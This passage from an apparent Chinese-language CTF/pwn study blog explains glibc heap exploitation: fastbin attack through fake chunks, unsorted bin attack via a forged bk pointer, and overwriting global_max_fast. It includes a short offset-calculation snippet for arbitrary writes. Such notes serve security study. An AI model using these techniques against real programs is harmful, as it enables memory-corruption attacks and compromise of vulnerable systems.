class="hljs-function"> })</span>)</span><br><span class="hljs-function"> {</span><br><span class="hljs-function"> <span class="hljs-title">errstr</span> = "<span class="hljs-title">free</span><span class="hljs-params">()</span>: <span class="hljs-title">invalid</span> <span class="hljs-title">next</span> <span class="hljs-title">size</span> <span class="hljs-params">(fast)</span>";</span><br><span class="hljs-function"> <span class="hljs-title">goto</span> <span class="hljs-title">errout</span>;</span><br><span class="hljs-function"> }</span><br><span class="hljs-function"> ...</span><br></code></pre></td></tr></table></figure><p>可以看到只需要满足前后两个chunksize的相关条件就能正常进fastbin</p><p>free后再次malloc对应size即可获得fakechunk地址处的一个chunk</p><p>fastbin attack的基本用法是获取一个已知地址的chunk然后修改内容</p><p>此外还有关于global_max_fat的用法,需要结合unsortedbin attack</p><p>基本思想就是利用fastbin的单链表和字节错位的方式从已知地址上分配一个chunk出来改写</p><h2 id="Unsorted-Bin-attack"><a href="#Unsorted-Bin-attack" class="headerlink" title="Unsorted Bin attack"></a>Unsorted Bin attack</h2><p>修改chunk的bk为&target-0x10,fd为任意值都不影响</p><p>通过malloc出这个chunk实现任意地址写,但之后可能会导致无法使用unsortedbin</p><p>修改后的值为unsorted_chunks(av),是一个很大的不确定的数字</p><p>一种用法是把循环、条件的值改成一个很大的数,没什么可说的</p><p>还有就是修改 heap 中的 global_max_fast 来使得更大的 chunk 可以被视为 fast bin,这样我们就可以去执行一些 fast bin attack 了。</p><ol><li><p>改写 <code>global_max_fast</code> 为一个较大的值,然后释放一个较大的堆块时,由于fastbins数组空间是有限的,其相对偏移将会往后覆盖,如果释放堆块的size可控,就可实现往fastbins数组(main_arena)后的任意地址写入所堆块的地址。</p><p>实现任意地址写的方式是:通过地址与fastbin数组的偏移计算出所需 <code>free</code> 的堆块的size,然后释放相应的堆块,即可实现往该地址写入堆块的地址以进一步利用。</p><p>计算偏移的代码可以如下:</p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">fastbin_ptr</span>=libc_base+libc.symbols[<span class="hljs-string">'main_arena'</span>]+<span class="hljs-number">8</span><br><span class="hljs-attr">idx</span>=(target_addr-fastbin_ptr)/<span class="hljs-number">8</span><br><span class="hljs-attr">size</span>=idx*<span class="hljs-number">0</span>x10+<span class="hljs-number">0</span>x20<br></code></pre></td></tr></table></figure><p>或者仍然使用fastbin attack,只是少了global_max_fast的限制</p></li></ol>]]></content>
<tags>
<tag>pwn</tag>
</tags>
</entry>
</search>